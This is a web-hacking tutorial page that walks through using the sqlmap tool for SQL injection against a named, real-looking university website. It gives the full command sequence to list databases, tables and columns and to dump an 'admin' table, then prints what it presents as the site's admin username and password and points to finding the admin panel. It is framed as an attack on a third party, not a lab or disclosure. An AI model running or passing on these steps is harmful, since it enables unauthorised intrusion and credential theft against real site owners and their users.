| Main » Articles » Web Hacking » SQL Injection |
SQLmap Step By Step Tutorial
| Today we will see the step-by-step tutorial of Sqlmap. Sqlmap is developed in Python and it is available with Backtrack 5 and Backtrack 5 R1 and all versions of Backtrak, Otherwise you can download seperately also from $ svn checkout https://svn.sqlmap.org/sqlmap/trunk/sqlmap sqlmap-dev Sqlmap is is best sql injection tool. With sqlmap we can know the database name and type of database i.e,Mysql or SqlServer or ........ and we can find the database name and tables related to that database and we can dump the data from the database. It is totally a database takeover tool Steps: 1.First we require the vulnerable target and here it is http://www.hu.edu.pk/viewfaculty.php?id=12 2.Go to Backtrack and type cd /pentest/database/sqlmap  3.Run the sqlmap ./sqlmap.py -u http://www.hu.edu.pk/viewfaculty.php?id=12 -u is the vulnerable url  ./sqlmap.py -u http://www.hu.edu.pk/viewfaculty.php?id=12 --dbs or ./sqlmap.py -u http://www.hu.edu.pk/viewfaculty.php?id=12 --current-db  if you write as --dbs then it will fetch all the databases in the server and if you write --current-db then it will fetch only the database related to the current website we will get the database name ./sqlmap.py -u http://www.hu.edu.pk/viewfaculty.php?id=12 -D c3results --tables  Here after -D we have to give the database name --tables means we are trying to fetch the tables in the current database and we will get the table names  after that we have to fetch only the table information which we required ./sqlmap.py -u http://www.hu.edu.pk/viewfaculty.php?id=12 -D c3results -T admin --columns we will get the names of columns in that table with datatype   ./sqlmap.py -u http://www.hu.edu.pk/viewfaculty.php?id=12 -D c3results -T admin -C id,passwrd,u_name --dump
 now we will get the total information in the table "admin"
 After finishing all the process you r having Database Name : c3results No of tables :48 Admin Table Name : admin admin username : 123_admin_123 admin password : 123_hazara_123 Now you are having admin username and admin password , find the Admin Panel and :) | |
| Views: 1903 | Comments: 1 | Rating: 4.3/3 |
| Total comments: 1 | |
|
| |
